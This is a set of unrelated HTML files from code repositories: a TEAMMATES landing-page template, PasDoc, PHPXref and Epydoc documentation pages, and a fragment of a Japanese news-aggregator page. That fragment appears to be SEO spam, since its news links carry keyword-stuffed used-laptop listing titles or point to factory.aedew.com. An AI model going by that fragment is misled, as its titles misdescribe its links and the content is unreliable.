width="120" height="170" onerror="this.src='/img/no_image.gif';this.width='120';this.height='120';" style="left:0px" /></a></div> <div class="item_status"> <span class="link_num over100">145<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://www.sankei.com/politics/news/151226/plt1512260001-n1.html" target="_blank" class="item_direct"> - www.sankei.com</a></div> <div class="item_title"><a href="">中古パソコン SSD搭載? 中古ノートパソコン DELL LATITUDE E4200 Core2Duo U9400 1.4GHz/PC3-8500 3GB/SSD 128GB/無線内蔵/Windows7 Professional導入/OFFICE2013付き中古,中古 中古ノートパソコン DELL Inspiron 1501 AMD Athlon64 X 2 TK-53 1.7GHz/PC2-5300 2GB/HDD 120GB/DVDマルチドライブ/無線LAN/Windows7 Home Premium 導入/リカバリCD・OFFICE2013付き </a></div> </div> <span class='debug' style='display:none;'><!--score: 26 --></span> <div class="item_box"> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/3df371797c2edb03a03491018247c6d1d6d51e42.jpg" width="160" height="120" onerror="this.src='/img/no_image.gif';this.width='120';this.height='120';" style="left:-20px" /></a></div> <div class="item_status"> <span class="link_num over20">62<span>コメント</span></span> <span class="date date_new">2 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151226-00010000-chibatopi-l12" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020410560d57ol.html">http://factory.aedew.com/images/Core2Duo/020410560d57ol.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 12 --></span> <div class="item_box"> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/5f191d984c12ff6d166bf0cb65f99c56fedea305.jpg" width="180" height="120" onerror="this.src='/img/no_image.gif';this.width='120';this.height='120';" style="left:-30px" /></a></div> <div class="item_status"> <span class="link_num over20">50<span>コメント</span></span> <span class="date date_new">4 時間前  </span> <a href="http://news.nicovideo.jp/watch/nw1961232" target="_blank" class="item_direct"> - news.nicovideo.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020410571w85wx.html">http://factory.aedew.com/images/Core2Duo/020410571w85wx.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 11 --></span> <div class="more"><a href="">もっと画像で見る</a></div></div> </div> </div> </div> </div> </div><!-- end field_inner --> </div><!-- end field--> <div id="footer_menu_bar" class="menu_bar"> <div id="footer_menu_bar_inner" class="menu_bar_inner"><ul><li><a href="/" class="selected">トップ</a></li><li><a href="/all/newitem/">速報</a></li><li><a href="/news/">ニュース総合</a></li><li><a href="/society/">政治経済</a></li><li><a href="/entertainment/">エンタメ</a></li><li><a href="/sports/">スポーツ</a></li><li><a href="/itnews/">IT</a></li><li><a href="/international/">海外</a></li><li><a href="/science/">科学</a></li><li><a href="/odekake/">おでかけ</a></li><li><a href="/movie/">動画</a></li><li><a href="/2ch/">2ch</a></li><li><a href="/neta/">ネタ</a></li><li><a href="/all/">すべて</a></li></ul></div> </div><!-- /menu_bar --> <div id="footer"> <div id="footer_inner"> <a href="" title="中古 中古ノートパソコン DELL Inspiron 1501 AMD Athlon64 X 2 TK-53 1.7GHz/PC2-5300 2GB/HDD 120GB/DVDマルチドライブ/無線LAN/Windows7 Home Premium 導入/リカバリCD・OFFICE2013付き "><img src="/img/logo_s.png" width="64px" height="32px" /></a>  <span class="icon_set"> <a href="" title="RSS" class="icon icon_rss"></a> <a href="http://www.twitter.com/" target="_blank" title="twitter中古 中古ノートパソコン DELL Inspiron 1501 AMD Athlon64 X 2 TK-53 1.7GHz/PC2-5300 2GB/HDD 120GB/DVDマルチドライブ/無線LAN/Windows7 Home Premium 導入/リカバリCD・OFFICE2013付き " class="icon icon_twitter"></a> <a href="https://www.facebook.com/" target="_blank" title="facebook中古 中古ノートパソコン DELL Inspiron 1501 AMD Athlon64 X 2 TK-53 1.7GHz/PC2-5300 2GB/HDD 120GB/DVDマルチドライブ/無線LAN/Windows7 Home Premium 導入/リカバリCD・OFFICE2013付き " class="icon icon_facebook"></a> </span> <br /> <a href="">このサイトについて</a> - <a href="">ご意見・お問い合わせ</a> - <a href="">中古 中古ノートパソコン DELL Inspiron 1501 AMD Athlon64 X 2 TK-53 1.7GHz/PC2-5300 2GB/HDD 120GB/DVDマルチドライブ/無線LAN/Windows7 Home Premium 導入/リカバリCD・OFFICE2013付き </a> <br /><br /> <div class="footer_copyright"> <a href="">天気アプリ</a> | <a href="">中古 中古ノートパソコン DELL Inspiron 1501 AMD Athlon64 X 2 TK-53 1.7GHz/PC2-5300 2GB/HDD 120GB/DVDマルチドライブ/無線LAN/Windows7 Home Premium 導入/リカバリCD・OFFICE2013付き </a> | <a href="">画像検索</a> | <a href="">Android音楽プレイヤー</a> | <a href="">メモ帳アプリ</a> </div> </div><!-- end footer_inner--> </div><!-- end footer--> </div><!-- end main--> </body> </html>
src/web/app/pages-static/index-page/index-page.component.html
amarlearning/teammates
<main> <p class="h2 color-orange text-center"> Student peer evaluations/feedback, shareable instructor comments, and more... </p> <div class="text-center"> <img class="mx-auto" alt="Overview of TEAMMATES - anonymous peer feedback and confidential peer evaluations" src="assets/images/overview.png"> </div> <p class="h4 color-blue text-center"> <span class="color-orange">{{ submissionsNumber }}</span> feedback entries submitted so far ... </p> <div class="row"> <div class="margin-bottom-10px col-xs-10 col-sm-5 offset-xs-1 col-md-4 offset-md-2 col-lg-3 offset-lg-3"> <a class="btn btn-secondary btn-block" href="https://www.youtube.com/embed/mDtfmNmRwBM?autoplay=1" target="_blank" rel="noopener noreferrer"> <i class="fas fa-film"></i> Video Tour </a> </div> <div class="margin-bottom-10px col-xs-10 offset-xs-1 col-sm-5 offset-sm-0 col-md-4 col-lg-3"> <a class="btn btn-success btn-block" routerLink="/web/front/request">Request a Free Instructor Account</a> </div> </div> </main> <div class="text-center"> <img id="raisedEdge" src="assets/images/raised-edge.png"> </div> <div class="row"> <div class="col-xs-12 col-sm-3 text-center"> <img alt="TEAMMATES - Praised by Users" src="assets/images/overview_praise.png"> </div> <div class="col-xs-12 col-sm-8"> <h2>Praised by Users:</h2> <span *ngIf="testimonial"> {{ testimonial.content }}<br> - {{ testimonial.author }} </span> </div> </div> <div class="row"> <div class="col-xs-12 col-sm-3 text-center"> <img alt="TEAMMATES - Award winning, mature, field-tested and improving all the time" src="assets/images/overview_award_winning.png"> </div> <div class="col-xs-12 col-sm-8"> <h2>Award Winning, Mature, Field-tested:</h2> <p> TEAMMATES has been in operation since 2010. It has benefitted from the work of <a routerLink="/web/front/about">hundreds of developers</a>.<br> TEAMMATES won the Grand Prize at the OSS Awards World Challenge 2014 and was selected as a mentoring organization for Google Summer of Code Program (2014-2018) and Facebook Open Academy Program (2016). </p> </div> </div> <div class="row"> <div class="col-xs-12 col-sm-3 text-center"> <img alt="TEAMMATES - Designed for simplicity, flexibility, power" src="assets/images/overview_peerfeedback.png"> </div> <div class="col-xs-12 col-sm-8"> <h2>Designed for Simplicity, Flexibility, and Power:</h2> <p> TEAMMATES was designed by a team of teachers and students, for teachers and students. It aims to provide a powerful peer feedback and peer evaluations mechanism with a very high degree of flexibility. <a routerLink="/web/front/features">More about our features...</a> </p> </div> </div> <div class="row"> <div class="col-xs-12 col-sm-3 text-center"> <img alt="TEAMMATES - Powered by Google Infrastructure" src="assets/images/overview_google.png"> </div> <div class="col-xs-12 col-sm-8"> <h2>Powered by Google Infrastructure:</h2> <p> TEAMMATES runs on the <a href="https://cloud.google.com/products/" target="_blank" rel="noopener noreferrer">Google App Engine</a>, using cutting edge cloud technologies and benefitting from the same systems and infrastructure that power Google's applications. </p> </div> </div> <div class="row"> <div class="col-xs-12 col-sm-3 text-center"> <img alt="TEAMMATES - Growing global community" src="assets/images/overview_countries.png"> </div> <div class="col-xs-12 col-sm-8"> <h2>Growing Global Community:</h2> <p> TEAMMATES community is growing fast, spanning over 500,000 users from over 1,600 universities from many countries across the globe. </p> <p> <a routerLink="/web/front/usermap">See who is using TEAMMATES.</a> </p> </div> </div> <div class="row"> <div class="col-xs-12 col-sm-3 text-center"> <img alt="TEAMMATES - Not for Profit" src="assets/images/overview_funding.png"> </div> <div class="col-xs-12 col-sm-8"> <h2>Not for Profit:</h2> <p> TEAMMATES does not have commercial ambitions. It is funded mainly by education grants from the National University of Singapore. TEAMMATES also received funding support under the <a href="https://summerofcode.withgoogle.com/" target="_blank" rel="noopener noreferrer">Google Summer of Code</a> program in 2014-2018. </p> </div> </div> <div class="row"> <div class="col-xs-12 col-sm-3 text-center"> <img alt="TEAMMATES - Well received by Academic community" src="assets/images/overview_conference.png"> </div> <div class="col-xs-12 col-sm-8"> <h2>Well Received by the Academic Community:</h2> <p> TEAMMATES has been presented, and well-received, in education-related conferences such as the <a href="https://conferences.computer.org/cseet/2011/CSEET_2011/" target="_blank" rel="noopener noreferrer">International Conference on Software Engineering Education and Training (CSEET)</a>, the <a href="http://www.cdtl.nus.edu.sg/Tlhe/tlhe2011/default.htm" target="_blank" rel="noopener noreferrer">International Conference on Teaching and Learning in Higher Education (TLHE)</a>, the <a href="https://iated.org/archive/edulearn13" target="_blank" rel="noopener noreferrer">EDULEARN13 Conference (Spain)</a>, and the <a href="http://cdtl.nus.edu.sg/tel2013/" target="_blank" rel="noopener noreferrer">Tel2013 Symposium (Singapore)</a>. </p> </div> </div>
Dokumentation/AllClasses.html
ITPM-Projektteam/Team-Blau
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd"> <html> <head> <title>Roboter-Fangen: Alle Klassen, Schnittstellen, Objekte und Records</title> <meta name="generator" content="PasDoc 0.14.0"> <meta http-equiv="content-type" content="text/html; charset=iso-8859-15"> <script type="text/javascript" src="tipuesearch/jquery.min.js"></script> <script type="text/javascript" src="tipuesearch/tipuesearch_data.js"></script> <link rel="stylesheet" type="text/css" href="tipuesearch/tipuesearch.css"> <script type="text/javascript" src="tipuesearch/tipuesearch_set.js"></script> <script type="text/javascript" src="tipuesearch/tipuesearch.js"></script> <link rel="StyleSheet" type="text/css" href="pasdoc.css"> </head> <body> <table class="container"><tr><td class="navigation"> <h2>Roboter-Fangen</h2><p><a href="AllUnits.html" class="navigation">Units</a></p><p><a href="ClassHierarchy.html" class="navigation">Klassenhierarchie</a></p><p><a href="AllClasses.html" class="navigation">Klassen, Interfaces und Objects</a></p><p><a href="AllTypes.html" class="navigation">Datentypen</a></p><p><a href="AllVariables.html" class="navigation">Variablen</a></p><p><a href="AllConstants.html" class="navigation">Konstanten</a></p><p><a href="AllFunctions.html" class="navigation">Funktionen und Prozeduren</a></p><p><a href="AllIdentifiers.html" class="navigation">Bezeichner</a></p><p><form class="search-form" action="_tipue_results.html"><div class="search-input"><input type="text" name="q" id="tipue_search_input"></div><div class="search-button"><input type="button" id="tipue_search_button" onclick="this.form.submit();"></div></form> <div style="clear: both"></div> <script> $(document).ready(function() { $('#tipue_search_input').tipuesearch({ /* 10 items to display seems standard */ 'show': 10, /* For PasDoc docs, showing urls is not very useful, since the page title already shows the unit and identifier. */ 'showURL': false }); }); </script> </p></td><td class="content"> <h1 class="allitems">Alle Klassen, Schnittstellen, Objekte und Records</h1> <table class="itemstable wide_list"> <tr class="listheader"> <th class="itemname">Name</th> <th class="itemunit">Unit</th> <th class="itemdesc">Beschreibung</th> </tr> <tr class="list"> <td class="itemname"><a class="bold" href="mBeispiel.TBeispiel.html">TBeispiel</a></td> <td class="itemunit"><a class="bold" href="mBeispiel.html">mBeispiel</a></td> <td class="itemdesc"><p>Kurze Beschreibung der Klasse <code>TBeispiel</code></p></td> </tr> </table> <hr noshade size="1"><span class="appinfo"><em>Erstellt mit <a href="http://pasdoc.sourceforge.net/">PasDoc 0.14.0</a>. </em> </span> </td></tr></table></body></html>
_variables/otherdate.html
mgsolipa/b2evolution_phpxref
<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <html> <head> <title>PHPXRef 0.7.1 : Unnamed Project : Variable Reference: $otherdate</title> <link rel="stylesheet" href="../sample.css" type="text/css"> <link rel="stylesheet" href="../sample-print.css" type="text/css" media="print"> <style id="hilight" type="text/css"></style> <meta http-equiv="content-type" content="text/html;charset=iso-8859-1"> </head> <body bgcolor="#ffffff" text="#000000" link="#801800" vlink="#300540" alink="#ffffff"> <table class="pagetitle" width="100%"> <tr> <td valign="top" class="pagetitle"> [ <a href="../index.html">Index</a> ] </td> <td align="right" class="pagetitle"> <h2 style="margin-bottom: 0px">PHP Cross Reference of Unnamed Project</h2> </td> </tr> </table> <!-- Generated by PHPXref 0.7.1 at Sat Nov 21 22:13:19 2015 --> <!-- PHPXref (c) 2000-2010 Gareth Watts - gareth@omnipotent.net --> <!-- http://phpxref.sourceforge.net/ --> <script src="../phpxref.js" type="text/javascript"></script> <script language="JavaScript" type="text/javascript"> <!-- ext='.html'; relbase='../'; subdir='_variables'; filename='index.html'; cookiekey='phpxref'; handleNavFrame(relbase, subdir, filename); logVariable('otherdate'); // --> </script> <script language="JavaScript" type="text/javascript"> if (gwGetCookie('xrefnav')=='off') document.write('<p class="navlinks">[ <a href="javascript:navOn()">Show Explorer<\/a> ]<\/p>'); else document.write('<p class="navlinks">[ <a href="javascript:navOff()">Hide Explorer<\/a> ]<\/p>'); </script> <noscript> <p class="navlinks"> [ <a href="../nav.html" target="_top">Show Explorer</a> ] [ <a href="index.html" target="_top">Hide Navbar</a> ] </p> </noscript> [<a href="../index.html">Top level directory</a>]<br> <script language="JavaScript" type="text/javascript"> <!-- document.writeln('<table align="right" class="searchbox-link"><tr><td><a class="searchbox-link" href="javascript:void(0)" onMouseOver="showSearchBox()">Search</a><br>'); document.writeln('<table border="0" cellspacing="0" cellpadding="0" class="searchbox" id="searchbox">'); document.writeln('<tr><td class="searchbox-title">'); document.writeln('<a class="searchbox-title" href="javascript:showSearchPopup()">Search History +</a>'); document.writeln('<\/td><\/tr>'); document.writeln('<tr><td class="searchbox-body" id="searchbox-body">'); document.writeln('<form name="search" style="margin:0px; padding:0px" onSubmit=\'return jump()\'>'); document.writeln('<a class="searchbox-body" href="../_classes/index.html">Class<\/a>: '); document.writeln('<input type="text" size=10 value="" name="classname"><br>'); document.writeln('<a id="funcsearchlink" class="searchbox-body" href="../_functions/index.html">Function<\/a>: '); document.writeln('<input type="text" size=10 value="" name="funcname"><br>'); document.writeln('<a class="searchbox-body" href="../_variables/index.html">Variable<\/a>: '); document.writeln('<input type="text" size=10 value="" name="varname"><br>'); document.writeln('<a class="searchbox-body" href="../_constants/index.html">Constant<\/a>: '); document.writeln('<input type="text" size=10 value="" name="constname"><br>'); document.writeln('<a class="searchbox-body" href="../_tables/index.html">Table<\/a>: '); document.writeln('<input type="text" size=10 value="" name="tablename"><br>'); document.writeln('<input type="submit" class="searchbox-button" value="Search">'); document.writeln('<\/form>'); document.writeln('<\/td><\/tr><\/table>'); document.writeln('<\/td><\/tr><\/table>'); // --> </script> <div id="search-popup" class="searchpopup"><p id="searchpopup-title" class="searchpopup-title">title</p><div id="searchpopup-body" class="searchpopup-body">Body</div><p class="searchpopup-close"><a href="javascript:gwCloseActive()">[close]</a></p></div> <h3>Variable Cross Reference</h3> <h2><a href="index.html#otherdate">$otherdate</a></h2> <b>Defined at:</b><ul> <li><a href="../inc/items/model/_itemlistlight.class.php.html">/inc/items/model/_itemlistlight.class.php</A> -> <a href="../inc/items/model/_itemlistlight.class.php.source.html#l717"> line 717</A></li> </ul> <br><b>Referenced 2 times:</b><ul> <li><a href="../inc/items/model/_itemlistlight.class.php.html">/inc/items/model/_itemlistlight.class.php</a> -> <a href="../inc/items/model/_itemlistlight.class.php.source.html#l717"> line 717</a></li> <li><a href="../inc/items/model/_itemlistlight.class.php.html">/inc/items/model/_itemlistlight.class.php</a> -> <a href="../inc/items/model/_itemlistlight.class.php.source.html#l718"> line 718</a></li> </ul> <!-- A link to the phpxref site in your customized footer file is appreciated ;-) --> <br><hr> <table width="100%"> <tr><td>Generated: Sat Nov 21 22:13:19 2015</td> <td align="right"><i>Cross-referenced by <a href="http://phpxref.sourceforge.net/">PHPXref 0.7.1</a></i></td> </tr> </table> </body></html>
Schrodinger/Schrodinger_2015-2_docs/python_api/api/PyQt4.QtGui.QDockWidget.DockWidgetFeatures-class.html
platinhom/ManualHom
<?xml version="1.0" encoding="ascii"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>PyQt4.QtGui.QDockWidget.DockWidgetFeatures</title> <link rel="stylesheet" href="epydoc.css" type="text/css" /> <script type="text/javascript" src="epydoc.js"></script> </head> <body bgcolor="white" text="black" link="blue" vlink="#204080" alink="#204080"> <!-- ==================== NAVIGATION BAR ==================== --> <table class="navbar" border="0" width="100%" cellpadding="0" bgcolor="#a0c0ff" cellspacing="0"> <tr valign="middle"> <!-- Tree link --> <th>&nbsp;&nbsp;&nbsp;<a href="module-tree.html">Trees</a>&nbsp;&nbsp;&nbsp;</th> <!-- Index link --> <th>&nbsp;&nbsp;&nbsp;<a href="identifier-index.html">Indices</a>&nbsp;&nbsp;&nbsp;</th> <!-- Help link --> <th>&nbsp;&nbsp;&nbsp;<a href="help.html">Help</a>&nbsp;&nbsp;&nbsp;</th> <!-- Project homepage --> <th class="navbar" align="right" width="100%"> <table border="0" cellpadding="0" cellspacing="0"> <tr><th class="navbar" align="center" >2015-2Schrodinger Python API</th> </tr></table></th> </tr> </table> <table width="100%" cellpadding="0" cellspacing="0"> <tr valign="top"> <td width="100%"> <span class="breadcrumbs"> PyQt4 :: QtGui :: QDockWidget :: DockWidgetFeatures :: Class&nbsp;DockWidgetFeatures </span> </td> <td> <table cellpadding="0" cellspacing="0"> <!-- hide/show private --> <tr><td align="right"><span class="options">[<a href="javascript:void(0);" class="privatelink" onclick="toggle_private();">hide&nbsp;private</a>]</span></td></tr> <tr><td align="right"><span class="options" >[<a href="frames.html" target="_top">frames</a >]&nbsp;|&nbsp;<a href="PyQt4.QtGui.QDockWidget.DockWidgetFeatures-class.html" target="_top">no&nbsp;frames</a>]</span></td></tr> </table> </td> </tr> </table> <!-- ==================== CLASS DESCRIPTION ==================== --> <h1 class="epydoc">Class DockWidgetFeatures</h1><p class="nomargin-top"></p> <pre class="base-tree"> <a href="object-class.html">object</a> --+ | sip.simplewrapper --+ | <strong class="uidshort">QDockWidget.DockWidgetFeatures</strong> </pre> <hr /> <p>QDockWidget.DockWidgetFeatures(QDockWidget.DockWidgetFeatures) QDockWidget.DockWidgetFeatures(int) QDockWidget.DockWidgetFeatures()</p> <!-- ==================== INSTANCE METHODS ==================== --> <a name="section-InstanceMethods"></a> <table class="summary" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr bgcolor="#70b0f0" class="table-header"> <td colspan="2" class="table-header"> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr valign="top"> <td align="left"><span class="table-header">Instance Methods</span></td> <td align="right" valign="top" ><span class="options">[<a href="#section-InstanceMethods" class="privatelink" onclick="toggle_private();" >hide private</a>]</span></td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="__and__"></a><span class="summary-sig-name">__and__</span>(<span class="summary-sig-arg">x</span>, <span class="summary-sig-arg">y</span>)</span><br /> x&amp;y</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="__eq__"></a><span class="summary-sig-name">__eq__</span>(<span class="summary-sig-arg">x</span>, <span class="summary-sig-arg">y</span>)</span><br /> x==y</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="__ge__"></a><span class="summary-sig-name">__ge__</span>(<span class="summary-sig-arg">x</span>, <span class="summary-sig-arg">y</span>)</span><br /> x&gt;=y</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="__gt__"></a><span class="summary-sig-name">__gt__</span>(<span class="summary-sig-arg">x</span>, <span class="summary-sig-arg">y</span>)</span><br /> x&gt;y</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="__iand__"></a><span class="summary-sig-name">__iand__</span>(<span class="summary-sig-arg">x</span>, <span class="summary-sig-arg">y</span>)</span><br /> x&amp;=y</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="__int__"></a><span class="summary-sig-name">__int__</span>(<span class="summary-sig-arg">x</span>)</span><br /> int(x)</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="__invert__"></a><span class="summary-sig-name">__invert__</span>(<span class="summary-sig-arg">x</span>)</span><br /> ~x</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="__ior__"></a><span class="summary-sig-name">__ior__</span>(<span class="summary-sig-arg">x</span>, <span class="summary-sig-arg">y</span>)</span><br /> x|=y</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="__ixor__"></a><span class="summary-sig-name">__ixor__</span>(<span class="summary-sig-arg">x</span>, <span class="summary-sig-arg">y</span>)</span><br /> x^=y</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="__le__"></a><span class="summary-sig-name">__le__</span>(<span class="summary-sig-arg">x</span>, <span class="summary-sig-arg">y</span>)</span><br /> x&lt;=y</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="__lt__"></a><span class="summary-sig-name">__lt__</span>(<span class="summary-sig-arg">x</span>, <span class="summary-sig-arg">y</span>)</span><br /> x&lt;y</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="__ne__"></a><span class="summary-sig-name">__ne__</span>(<span class="summary-sig-arg">x</span>, <span class="summary-sig-arg">y</span>)</span><br /> x!=y</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="__nonzero__"></a><span class="summary-sig-name">__nonzero__</span>(<span class="summary-sig-arg">x</span>)</span><br /> x != 0</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="__or__"></a><span class="summary-sig-name">__or__</span>(<span class="summary-sig-arg">x</span>, <span class="summary-sig-arg">y</span>)</span><br /> x|y</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="__rand__"></a><span class="summary-sig-name">__rand__</span>(<span class="summary-sig-arg">x</span>, <span class="summary-sig-arg">y</span>)</span><br /> y&amp;x</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="__ror__"></a><span class="summary-sig-name">__ror__</span>(<span class="summary-sig-arg">x</span>, <span class="summary-sig-arg">y</span>)</span><br /> y|x</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="__rxor__"></a><span class="summary-sig-name">__rxor__</span>(<span class="summary-sig-arg">x</span>, <span class="summary-sig-arg">y</span>)</span><br /> y^x</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="__xor__"></a><span class="summary-sig-name">__xor__</span>(<span class="summary-sig-arg">x</span>, <span class="summary-sig-arg">y</span>)</span><br /> x^y</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td colspan="2" class="summary"> <p class="indent-wrapped-lines"><b>Inherited from <code>sip.simplewrapper</code></b>: <code>__init__</code>, <code>__new__</code> </p> <p class="indent-wrapped-lines"><b>Inherited from <code><a href="object-class.html">object</a></code></b>: <code><a href="object-class.html#__delattr__">__delattr__</a></code>, <code><a href="object-class.html#__format__">__format__</a></code>, <code><a href="object-class.html#__getattribute__">__getattribute__</a></code>, <code><a href="object-class.html#__hash__">__hash__</a></code>, <code><a href="object-class.html#__reduce__">__reduce__</a></code>, <code><a href="object-class.html#__reduce_ex__">__reduce_ex__</a></code>, <code><a href="object-class.html#__repr__">__repr__</a></code>, <code><a href="object-class.html#__setattr__">__setattr__</a></code>, <code><a href="object-class.html#__sizeof__">__sizeof__</a></code>, <code><a href="object-class.html#__str__">__str__</a></code>, <code><a href="object-class.html#__subclasshook__">__subclasshook__</a></code> </p> </td> </tr> </table> <!-- ==================== PROPERTIES ==================== --> <a name="section-Properties"></a> <table class="summary" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr bgcolor="#70b0f0" class="table-header"> <td colspan="2" class="table-header"> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr valign="top"> <td align="left"><span class="table-header">Properties</span></td> <td align="right" valign="top" ><span class="options">[<a href="#section-Properties" class="privatelink" onclick="toggle_private();" >hide private</a>]</span></td> </tr> </table> </td> </tr> <tr> <td colspan="2" class="summary"> <p class="indent-wrapped-lines"><b>Inherited from <code><a href="object-class.html">object</a></code></b>: <code><a href="object-class.html#__class__">__class__</a></code> </p> </td> </tr> </table> <!-- ==================== NAVIGATION BAR ==================== --> <table class="navbar" border="0" width="100%" cellpadding="0" bgcolor="#a0c0ff" cellspacing="0"> <tr valign="middle"> <!-- Tree link --> <th>&nbsp;&nbsp;&nbsp;<a href="module-tree.html">Trees</a>&nbsp;&nbsp;&nbsp;</th> <!-- Index link --> <th>&nbsp;&nbsp;&nbsp;<a href="identifier-index.html">Indices</a>&nbsp;&nbsp;&nbsp;</th> <!-- Help link --> <th>&nbsp;&nbsp;&nbsp;<a href="help.html">Help</a>&nbsp;&nbsp;&nbsp;</th> <!-- Project homepage --> <th class="navbar" align="right" width="100%"> <table border="0" cellpadding="0" cellspacing="0"> <tr><th class="navbar" align="center" >2015-2Schrodinger Python API</th> </tr></table></th> </tr> </table> <table border="0" cellpadding="0" cellspacing="0" width="100%%"> <tr> <td align="left" class="footer"> Generated by Epydoc 3.0.1 on Sat May 9 06:30:56 2015 </td> <td align="right" class="footer"> <a target="mainFrame" href="http://epydoc.sourceforge.net" >http://epydoc.sourceforge.net</a> </td> </tr> </table> <script type="text/javascript"> <!-- // Private objects are initially displayed (because if // javascript is turned off then we want them to be // visible); but by default, we want to hide them. So hide // them unless we have a cookie that says to show them. checkCookie(); // --> </script> </body> </html>
Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/jsref/tryjsref_style_alignitems.html
platinhom/ManualHom
